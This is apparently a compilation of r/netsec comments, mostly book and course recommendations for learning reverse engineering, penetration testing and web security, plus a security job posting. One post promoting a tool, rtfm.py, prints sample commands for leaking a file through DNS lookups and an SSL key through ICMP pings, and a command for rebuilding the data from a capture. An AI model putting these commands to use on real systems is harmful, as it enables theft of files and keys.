Best products from r/netsec

Hey /u/Xerack! I'm the original author of the post linked here.

Appreciate the feedback! If you think I could clarify anything better, please let me know.

As far as resources for Reverse Engineering, I can provide you with a baseline that I would recommend starting with.

x86 Assembly:


If you don't know assembly language at all, this list of videos was where I picked up a decent amount of x86 assembly language.


A few good books would be:

• Hacking: The Art of Exploitation I am a huge advocate for this book. I learned a lot from this and have read it multiple times. It is written very well and teaches someone with no experience how to do C programming and assembly. This is mainly a book for learning exploitation/vulnerability research, but that can play hand and hand with Reverse Engineering. It will show you the assembly language break down of basic exploits and this can help you with RE.
  
  
• Practical Reverse Engineering I read through the beginning of this book and it gave me some good foundations of understanding memory and computer architecture for RE along with assembly of course
  
  
• Secrets of Reverse Engineering This book is a bit in depth, but the beginning gives another good foundation for Comp Architecture and assembly stuff.
  
  
• The IDA Pro Book Haven't personally read this book yet, but I have been told it is the defacto standard for learning IDA Pro, and it has examples you can learn from.
  
  Hands On:
  
  
  
• Legend of Random Very useful hands on with tutorials. Mainly based on cracking, but that requires reverse engineering. Highly recommend this!
  
  
• Lenas Tutorials Again, another awesome hands on tutorial, mostly based on cracking as well.
  
  
• Crackmes These are more of challenges once you start to have a little understanding down
  
  Courses:
  
  Tons of courses on youtube. I learn well from visual, so I recommend these youtube videos:
  
  
  
• Basic Dynamic Analysis
  
• Real World Decompilation There are a few videos to this series and he disassembles a game, definitely nice to learn from.
  
  
  Beyond that, Google will always be your friend, and /r/reverseengineering. I also have a bunch of material for Malware RE, but that's a bit different than Software RE, though it is relatable.

The tangled web is great. I haven't finished it yet but what I've read so far is pretty insightful stuff. Security Engineering: http://www.amazon.com/Security-Engineering-Building-Dependable-Distributed/dp/0470068523/ref=dp_ob_title_bk : probably one of the better titles for security as a whole. I like to think phrack might also be a great resource but it's pretty dated material. Really you'll be learning so much just picking apart existing shit, crashing stuff, making love to your debugger, and just enjoying the shit out of yourself.. books will come secondary but they're still important. :-) Goodluck have fun!

I am currently a penetration tester with a small Healthcare penetration company. We perform black box security tests for Hospitals and Health Care organizations.

If you are looking for actual schooling then I suggest looking for a university with a Network Security/Information Assurance Degree. There are not too many with dedicated degrees, but it is becoming a much more popular field.

Most importantly go get some literature on the subject. Although reading can not take the place of actual experience, most books these days are designed to go along side of hands on experience or provide information if you wish to "further refine your skills".

If you are new to security I would suggest "The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy" By Patrick Engebretson. It is a great entry level book designed to introduce you to the concepts of penetration testing.

If you want to get down and dirty quickly "
Metasploit: The Penetration Tester's Guide" By David Kennedy is another great book though a bit more technical then the last.

These are only a few of many great books. If you want to become a good penetration tester, taste the fundamentals and then pick a focus to get good at. There are few jacks of all trades in Penetration testing.

Ok - Here's a list of books I've read in the last few years

• Gray Hat Hacking - The Ethical Hacker's Handbook - Really good intro to Software Sec / Reverse Enginering / Disclosure
  
• Counter Hack Reloaded - A 'bible' of phased attacks - classic book.
  
• Guide to Network Defense and Countermeasures - Technically designed as a 'prep' book for the SCNP, it's still a great read about IPS, IDS, NetSec Policies, Proxies, firewalls, packet filtering, etc
  
• Hacking Wireless Exposed - Great intro read on 802.11 sec.
  
• CWNA/CWSP Exam Guide - Assumes 0 knowledge about RF. More intense than Hacking Wireless Exposed, but also easier to learn from. I went into this book knowing very little about RF, left it feeling confident. Well written.
  
• Snort 2.1 - Self explanatory, but a book about the IDS system Snort. Not perfect, but again, great starter book.
  
• The Web Application Hacker's Handbook - The best for last. The holy grail of web hacking. Second edition SHOULD be coming very soon, depending on the drop date may be worth it to wait.
  
  As you can tell, I'm big on the technical books, and even exam prep books. This is just a selection, but I think it's a good starter pack to some different fields.
  

Senior Security Engineer

Hi, I'm Kevin Hock and I work on the DataDog security team.
We are looking for some talented security engineers to join our security team here in NYC.

How Do I Apply

Send me an email with your resume and GitHub at kh@datadoghq.com

What you will do

• Perform code and design reviews, contribute code that improves security throughout Datadog's products
  
• Eliminate bug classes
  
• Educate your fellow engineers about security in code and infrastructure
  
• Monitor production applications for anomalous activity
  
• Prioritize and track application security issues across the company
  
• Help improve our security policies and processes
  
  Who you should be
  
  
• You have significant experience with network and application security
  
• You can navigate the whole stack in pursuit of potential security issues
  
• You want to work in a fast, high growth startup environment
  
  Bonus points
  
  
• You contribute to security projects
  
• You're comfortable with python, go and javascript. (You won't find any PHP or Java here :D)
  
• CTF experience (I recommend you play with OpenToAll if you don't have any)
  
• Program analysis knowledge
  
  Sample interview questions
  
  
• Flip to a page of WAHH, TAOSSA, CryptoPals, ask you about it.
  
• Explain these acronyms DEP/ASLR/GS/CFI/AFL/ASAN/LLVM/ROP/BROP/COOP/RAP/ECB/CBC/CTR/HPKP/SSL/DNS/IP/HTTP/HMAC/GCM/Z3/SMT/SHA/CSRF/SQLi/DDoS/MAC/DAC/BREACH/CRIME?
  
• How would you implement TCP using UDP sockets?
  
• How do you safely store a password? (Hint: scrypt/bcrypt/pbkdf2)
  
• How does Let'sEncrypt work?
  
  Hat tip to Levi at SquareSpace, also on this thread, he is an awesome person to work with. David Wong, a crypto king of NCC, on this very Q4 thread, is also a great person to work with in Chicago.
  If you're looking to break stuff more than build stuff hat tip to Chris Rohlf's Yahoo! team.
  Random other places you can apply in nyc: MongoDB, Jane Street, 2 sigma, greenhouse.
  
  
  I personally applied because I love Python but I like the company a lot so far.

Aloha everyone, I would like to introduce a little tool i've been working on : rtfm.py

https://github.com/leostat/rtfm | https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/

The program aims to give you a database of helpful commands, references, cheatsheets and tips in an indexed, easy to search format.

You can search through the database using one or more of; The command, tags, URL's, references, author, date added, or, Comments to get the information you need. At the moment it has around 500 commands in it, and it comes with an updater to allow me to push more content to it from github.

At the moment its not perfect, with the code probably being a tad into the horrendous category, but it works! As a quick example, you may be on a box and wanting to exfil some data, for some odd reason you don't have internet access, but rtfm to the rescue!

12:10:root:rtfm: ./rtfm.py -R exfil
++++++++++++++++++++++++++++++
Command ID : 384
Command : for line in base64 -w 62 [file]; do host $line.[hostname]; done

Comment : exfil file through DNS, may want to encrypt, also assuming you have a short domain
Tags : linux,bash,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++
Command ID : 386
Command : ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in base64 sslfile.key | xxd -p -c 14; do line2=echo "11 $line 99" |tr -d ' '; ping -p $line2 -c 1 -M do 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32

Comment : Exfil over icmp
Tags : linux,networking,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++
Command ID : 496
Command : for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v "......................................................" | sed s/.11/11/g | grep "11.99" | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo +++++++++++++++++++; done

Comment : Convert exfil ICMP back to files from pcap
Tags : linux,networking,loop
Date Added : 2017-06-18
Added By : Innes
References
__
https://ask.wireshark.org/questions/15374/dump-raw-packet-data-field-only
++++++++++++++++++++++++++++++

Throughout the program I have tried to include references to where the commands have come from, however this has not always been possible. If you spot a missing reference or nod, please let me know and I will add it in!

There are a few bugs in the code i'm aware of, and a couple of things I need to add still but let me know what you think! If you like it, awesome, if you don't then boo. Have a look, and let me know what you think with any suggestions, or if your feeling nice, submit content for the database / suggestions or code to improve the program.

Have a great day all!

I've read a lot of these but I'm glad to see not all of them :) Adding to my reading list for sure.

Thanks!

EDIT: forgive me if these are already listed but just in case...

Bug Hunter's Diary - http://www.amazon.com/Bug-Hunters-Diary-Software-Security/dp/1593273851
Gives real hands on real-life experience in a "diary" format and covers some great bugs

Gray Hat Hacking - http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071742557
Despite a bad generic "ethical" title this book goes really in-depth on a lot of subjects (almost to the point of rambling actually) including fuzzing, client-side exploits (mostly browser-based), and much more.

Hacking Windows Exposed - http://www.amazon.com/Hacking-Exposed-Windows-Microsoft-Solutions/dp/007149426X
Another generic title but this book has small good parts scattered throughout, really written more for pentesters it has some very common red team methods but also has a few hidden gems hidden within the various subjects it tries to cover.

Also for anyone looking to get TAOSSA (The Art of Software Security Assessment) it's absolutely huge and WILL split down the middle while reading...it's sitting on my bookshelf right now in its ripped state but I've read it 4 times and still don't feel like all the material has sunken in, if you're going to buy any book at all it should be that one as it will provide countless hours/days/weeks/months of reading.

Hi Pandas_sniff! (love the name) I’m a firm advocate of the Web Application Hacker’s Handbook. I think if you look at the reviews for version 2 i’m probably one of the featured ones. It really is all encompassing for most of what application security testing should start out as. It does suffer from being a textual reference though (a snapshot in time), so I also commonly recommend learning from the OWASP Testing Guide v4 as it has frequent wiki-like updates. I could spend all day talking about resources for learners! There are some excellent (free) videos by Jeremy Druin on using Burp Suite and application testing, I absolutely love Pentesterlab.com and all of their exercises, and Sam has written a very good guide on getting started in bounty work

As for how effective these resources are “out of the gate” i think they are tremendously helpful. For example, using the above resources i’m sure any apt student of them could identify IDOR’s or basic injections. Over time these skills become second nature and free up the tester to focus on newer, cutting-edge hacks/technology. Hope that answers the question =)

I said it this in another comment but in my opinion Network Security by Kaufman, Perlman, and Speciner is hands down the best book to cover the field of network security as a whole. It covers many topics in a broad fashion, but also provides the tools necessary to understand cryptography, and the various protocols used on the Internet. I rarely read a book cover to cover and usually skip chapters of interest, but this book (including the glossary), I've read cover to cover. What keeps bringing me back is the authors have such a great sense of humour and it shows in their writing, as they inject jokes and anecdotes throughout the text.

If you're a novice, as most people start out as, then I would recommend the following:

The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy

Hacking For Dummies

Grey Hat Hacking

Hacking Exposed - 5th Edition - May be outdated

Network Security Bible

So now people here may disagree on the books I've suggested, and that's fine, but it definitely depends on what you're trying to learn and/or accomplish. Google is a great place to start as well without spending a fortune on books.

Some great websites:

SANS
Dark Reading

I'm sure you can find plenty more.

And always ask questions, even if you think its a stupid question. Being on Reddit and having the luxury of anonymity, you can ask away without worrying about getting personally ridiculed.

As far as hackerspaces and defcon, they were just a suggestion. If you ever are able to get to a hackerspace though, I highly recommend it.

stormehh has some good points.

I agree, and would argue that you are better off learning the fundamentals at this stage in your life. I understand your urge to get out there and explore different tools and techniques as fast as possible (trust me, I've been there myself), but take my word for it when I say that you will get more out of it when you understand the underlying concepts/technologies/protocols.

This might sound old fashioned, but read these books. It's a lot of material, but well worth the effort. You can get all three of them used for about $75:

"Computer Security: Art and Science" - Matt Bishop

"The TCP/IP Guide: A Comprehensive, Illustrated Internet Protocols Reference" - Charles M. Kozierok

"Counter Hack Reloaded: A Step-by-Step Guide to Computer Attacks and Effective Defenses (2nd Edition)" - Edward Skoudis & Tom Liston

Good luck to you, and follow the light side of the force.

best advice i can give is to start reading anything and everything you can get your hands on related to programming, operating systems, networking, security, etc......



a few books i'm reading/have read/on my list to read and all are excellent starting points:

BackTrack 4: Assuring Security by Penetration Testing (this book was just released and still relevant when using BackTrack5)

Metasploit: The Penetration Tester's Guide

Ninja Hacking: Unconventional Penetration Testing Tactics and Techniques

Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning

Gray Hat Hacking The Ethical Hackers Handbook, 3rd Edition



plenty of links to keep you busy for awhile:
Open Penetration Testing Bookmarks Collection

If you're talking about memory corruption, you're looking for Smashing The Stack in 2010. However, most experts in application security and modern exploitation techniques recommend a more practical research-driven approach to learning about memory corruption mitigation techniques, so keep that in mind while reading this paper. As always, The Bible is relevant.

If you're talking about embedded device reverse engineering, you'll probably get the best answer from the /r/ReverseEngineering subreddit.

If you're talking about kernel bugs and kernel module bugs, I wish you luck. Bugs and vulnerabilities in these types of systems, usually require very obscure knowledge in very specific systems. Not for beginners or the faint of heart.

If you're talking about web bugs, you're looking for the OWASP Top 10. The web is mostly a giant joke, and widely uninteresting (this is an unpopular opinion on this subreddit).

Since searching wikipedia turned up the Timeline of Non-Sexual Social Nudity(TIL) I'm just going to guess you're you're looking for a more techie true to life rendition of the hacker archetype based on the amazon synopsis.

Based on that I'd recommend:

Cryptonomicon

just.go.read.it.right.now.

It may take a little effort to get into, damn thing is a tomb, but give it a chance. You will not be disappoint.

--------------

Stealing the Network Series

How to Own a Box

How to Own a Continent

How to Own an Identity

How to Own a Shadow

comments

These are told in a chapter/viewpoint style, each chapter is usually written by a different knowledgeable, and sometimes security famous, security dude. Out of those I've only read How to Own an Identity so far, but it was pretty good and and my guess is that the rest hold up to that standard, so dive in. They are a series from what I understand so reading them in order is probably a good idea, but not completely necessary.

_____

And then for flair (these are more scifi/cyberpunk-ish; so if that's not your thing avoid):

Snowcrash

comments

The main character's name is Hiro Protagonist. No seriously. He's a ninja, he's a hacker, he lives in a U-Store-it container, and he delivers pizza for the Mob in a post-collapse USA, can you really not read this book now?

--------------

The Diamond Age

comments

All about the practical social implications of nanotechnolgy told through the eyes of a young girl, her father, and an assortment of disposable associates.

--------------

The Sprawl Trilogy

Neuromancer

Count Zero

Mona Lisa Overdrive

comments

I've only read Neuromancer and Mona Lisa Overdrive, which were both great, so I'm guessing Count Zero is probably good too.

Similar to Snowcrash in the lone gun hacker sense, except with more drugs a little bit more of a scattered tone.


And if all else fails there's always the DEF CON reading list.

ninja edits because I suck at markdown

• Malware Analyst's CookBook is pretty good, lots of examples of techniques with example code.
  
• The Rootkit Arsenal is also supposedly really good.
  
• The Shellcoders Handbook (2nd edition) will help you get up to speed with mainstream exploitation techniques.
  
• Linux Kernel Development is a short read and describes the architecture of the Linux Kernel. Also explains many basic Operating System concepts.
  
• UNIX Network Programming, Volume 1: The Sockets Networking API (3rd Edition) introduced IP/IPv6/IPSec/TCP/UDP/SCTP as well as the POSIX Socket API.
  
• Cannot stress this enough, pickup your choice of a C/C++/Java/C#/Python/Ruby/etc book. Having a solid understanding of a programming language will make life much easier.

Not very specific to those technologies but:

>Web Application Hackers Handbook (2nd edition: http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470) is pretty thorough with the vectors of attack, examples, and includes a methodology for pentesters.

>The Tangled Web - a "light" but delightful read from Zalewski on the history and modern security of web apps. He also wrote the http://code.google.com/p/browsersec/

Both are pretty recent and cover some good ground.

So Tangled Web is a good book but it's not about exploitation in the sense it seems you're meaning. The Kernel Exploitation book is good but daunting if you don't have any exploit development experience. You may also consider A Bug Hunter's Diary by Tobias Klein

Grab a copy of the Intel IA-32 Assembly Reference http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html. I wouldn't recommend reading through this as a how-to but having a local copy to reference various unfamiliar instructions would be helpful.

Phrack articles are pretty useful too. Exploit-DB and packetstorm will be useful for finding working exploits for legacy bugs you may be practicing on.

Whatever language you're writing your exploits in (Perl/Python/Ruby) you'll probably want a reference for that.

If we are going to talk about a good new netsec book, I recommend everyone check out "Tobias Klein's" - A Bug Hunter's Diary. You can get it at nostarch.com but I recommend saving the cash and getting it from amazon.com. I got my copy on Monday and its been a pretty good read so far.

Network security books are almost all scams that monetize the escapist fantasies of the fan base. Security is mostly assumption management. Don't assume a third party rehash is going to make you understand the underlying code any better.

That said, The Art of Software Security Assessment is pretty good. It's one of the books openbsd recommends for developers. It's quite healthy to know how anything talked about in the past 15 or so articles of phrack works, too.

Don't read anything that makes you think there is less for you to know after reading it. It's poison. And until you put the concepts into action, you don't know shit.

A little prophecy here - neither WebInspect nor Fortify will actually solve any of your problems, they'll just point you at them. Having bug reports doesn't mean the issues get solved (correctly), and to get the ones which actually matter you'll have to wade through lots of false positives, even with the better tools.

In order to determine what counts and what doesn't and how you fix it if it does, you actually need security competence. Which is something the developers who are often facing hundreds or thousands of bug reports from these tools often do not have, since they were never trained and/or had no time to further look into.

When it comes to pen testing and app sec assessments, it really depends on what you're looking at. If it's web apps mostly, well, I am sure you already know OWASP. I kinda liked the Web Application Hacker's Handbook.
When it comes to other stuff, this is a great book http://www.amazon.com/The-Software-Security-Assessment-Vulnerabilities/dp/0321444426

I am, btw, a CSSLP, and I think the cert is kinda fluffy.

Well TCP/IP is an entire protocol suite. In addition to IP, TCP, and UDP, it includes higher level protocols like HTTP (uses TCP), DNS (UDP more commonly than TCP), and ICMP (uses IP, not TCP or UDP).

My understanding is that it's called TCP/IP because those were the first protocols and everything else coalesced around/on top of them. Microsoft offers a pretty decent chart showing examples of the layering/encapsulation of the protocols in the suite here.

If you want to dive deeper, Steven's three-volume TCP/IP Illustrated is the de facto reference manual for the Internet -- though dated, it's still very useful and available for cheap used. Alternatively, No Starch came out with a tome of their own called TCP/IP Guide which I've heard a couple colleagues recommend.

Netsec is a pretty wide topic, which makes your question somewhat hard to answer. In all honesty, I think the best place to start right now for a high-level introduction to networking is this Wikipedia article. There are, of course, many books you can read for a deeper understanding; as well as the RFCs for a definitive explanation of every Internet standard.


Another recommendation would be to install Linux (try Ubuntu or Fedora), and just run it. Add users and groups, configure SSH and Apache, etc. Linux will come with several different programming languages (Perl, Python, bash), and you'll be able to install many more with very little effort.


Don't worry about having a formal background in computers, because that's not very important. Besides, no one can teach you the curiosity you'll need to get really deep into this stuff. Just expect to spend countless hours in front of a computer, and expect to never stop reading and learning.

I'd suggest "The Mobile Application Hacker's Handbook" (http://www.amazon.com/The-Mobile-Application-Hackers-Handbook/dp/1118958500).

Combine it with "The Web Application Hacker's Handbook" (http://www.amazon.com/gp/product/1118026470/) and you should have a pretty good handle on testing mobile security, including the backend stuff.

These are both from a "breakers" point of view, but they go into how to secure/prevent the various attacks they teach, so are a very good source for developers.

As some general tips and what to look for, especially concerning secure communications, look into certificate pinning, message signing, and don't store anything sensitive on the device without encryption (or on the server).

Source: I break mobile apps and websites for a living

For people who want to get into network security and have have a moderately good grasp on programming, I nominate Gray Hat Hacking . Each chapter in the book is basically devoted to a certain aspect of hacking (windows exploits, xss attacks, metasploit, etc). It's a good all around introduction to pretty much all the important aspects you need to know.

next, I recommend getting familiar with metasploit as it can save you a lot of time with a lot of different types of attacks. The guys from offensive security have a website , but there is also an ebook available if you want it.

It's important to understand security from both an offensive and defensive side of things.

Security Engineering by Ross J. Anderson. It is very useful and gives you a 360-degree view from different industries from a security standpoint, this approach encourages you to think out of the box since some ideas from other industries can be useful in another.

Two good books I'd recommend for getting started in exploitation:

• http://www.amazon.com/Hacking-The-Art-Exploitation-Edition/dp/1593271441
  
  
• http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/ref=sr_1_2?s=books&ie=UTF8&qid=1344637332&sr=1-2&keywords=shellcoder%27s+handbook
  
  Both are good resources to start with. Other than that, learn vdb/windbg/ollydbg/your debugger of choice, use it, and start making binaries do your whim. I started by debugging notepad back in the day.

The first rule of "learning the basics of hacking" is that you don't ask or talk about "learning the basics of hacking". I learned this the hard way when I was about 12 years old on irc.

And there is really only one shade of hacking, and that is 'gray'. You may become a white hat, or a black hat depending on your motivation. But I personally do not look at anything in absolute contrast. The world is gray, hacking is gray, your mother is gray.

Speaking of 'gray', if I were you I would check out this book

I have not read it myself, only skimmed through it over coffee at barnes&noble. Looks like it covers a very broad spectrum of hacking and seems 'user friendly' enough. Also start reading 2600, and check out securitytube.net

I haven't done this myself yet but I'm pretty sure this is where something like Ida Pro comes in where you disassemble the program so it is now in assembly language. Then you can use your assembly language skills to step through some of the code. Like you may see variables stored in a weird ways or memory handled in a bad way.

A book that may get you started is: The Bug Hunters Diary

The mother of all auditing books, better than Jon Erickson's jack of all trades - master of none approach imo.

The shellcoders handbook makes for an excellent accompaniment, too.

I'm in the same boat as you. I'm currently trying to lay the foundation for an InfoSec career and I've been bookmarking some of the helpful posts I find. Here's what I have so far:

http://www.reddit.com/r/netsec/comments/dpsfp/can_netsec_help_me_to_get_started_into_the/
http://www.reddit.com/r/netsec/comments/edv2u/good_places_to_start_a_career_in_netsec/
http://www.reddit.com/r/netsec/comments/d3hua/how_to_get_started_in_netsec/
http://www.chakraborty.ch/organization/getting-started-in-security/

I just bought this book, I've seen it recommended several times as a great place to start learning TCP/IP.

Consider getting, or at least studying up on, the A+, Net+, Linux+, and Security+ CompTIA certs. They may help you get entry-level jobs and are a good way to learn the basics, but don't count on them to get you serious employment.

Stealing the Network: How to Own a Continent is pretty good fiction - in the sense that it hasn't really happened. It's completely plausible, though...

http://www.amazon.co.uk/exec/obidos/ASIN/0470068523

Awesome Book.

Read Hacking: The Art of Exploitation


Honestly I could recommend this book for the programming section alone.

You can practice on open source projects. This is another book I liked:
http://www.amazon.com/Bug-Hunters-Diary-Software-Security/dp/1593273851/

A mix of black box testing, knowing what vulnerable code looks like and reverse engineering.

Yes, here's the book (https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470). The key with web application security, the one main rule is, never trust anything the user sends you. That means, you can do a lot (almost everything) just manipulating HTTP requests, which usually requires only minimal HTML/CSS knowledge.

Without understanding some HTML/CSS/JS, you may have a hard time with getting XSS to pop, without knowing some XML, you might have trouble understanding things like XXE, and without understand SQL, you might have issues with SQLi. BUT, there are a lot of things you can start doing without that.

In general though, you can do a lot by just learning how to proxy requests with Burp and setting up a vulnerable web app. If you're trying to learn and gain fluency in HTML/CSS, you're going to be doing a lot of unnecessary work. It's good to understand how these work, but you'll pick up most of what you need as you research and learn about specific vulnerabilities.

Add a Malware Analysis section to books and punch in Malware Analyst's Cookbook. ;)

http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033

I would also add in OS hardening some where and link to NSA's guides:

http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml

http://www.lulu.com/product/ebook/owasp-testing-guide/17463506?productTrackingContext=author_spotlight_1412179_

http://nostarch.com/tangledweb.htm

http://www.syngress.com/hacking-and-penetration-testing/Web-Application-Obfuscation/

http://www.syngress.com/hacking-and-penetration-testing/Seven-Deadliest-Web-Application-Attacks/

http://www.syngress.com/hacking-and-penetration-testing/SQL-Injection-Attacks-and-Defense/

http://www.webhackingexposed.com/

http://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/1118026470/ref=dp_ob_title_bk

TCP/IP Illustrated by Stevens, a must read!

http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469

The Basics of Hacking and Penetration Testing

http://www.amazon.com/The-Basics-Hacking-Penetration-Testing/dp/1597496553

You should just order this book imho.
http://www.amazon.com/Rootkit-Arsenal-Escape-Evasion-Corners/dp/1598220616/ref=sr_1_2?ie=UTF8&qid=1303542136&sr=8-2

Its more recent, covers more techniques and is extremely in depth and it has all the sourcecode in the back of the book.

wartex8 mentioned it, but I can't speak about Hacking: The Art of Exploitation highly enough...

http://www.amazon.com/The-Software-Security-Assessment-Vulnerabilities/dp/0321444426

Done and Done.

start here, continue here, report back in two months.

If you want to understand how everything works under the hood:

http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469

Not the most thrilling read but you'll come out of it with a deep understanding of how TCP/IP works.

• The Shellcoders Handbook by Chris Anley
  
• Reversing: Secrets of Reverse Engineering by Eldad Eilam
  
• Hacking: The Art of Exploitation by Jon Erickson
  
• The videos and slides from the NYU Poly class "Penetration Testing and Vulnerability Analysis"

+1 for Gray Hat Hacking, the new edition just came out and I haven't had a chance to pick it up yet. Gray Hat Hacking will teach you the fundamentals of writing exploits from scratch.

The sequel to Gray Hat Hacking would have to be Hacking: The Art of Exploitation

I tried starting at H:AOE and it was just too difficult. Picked up Gray Hat and everything made sense!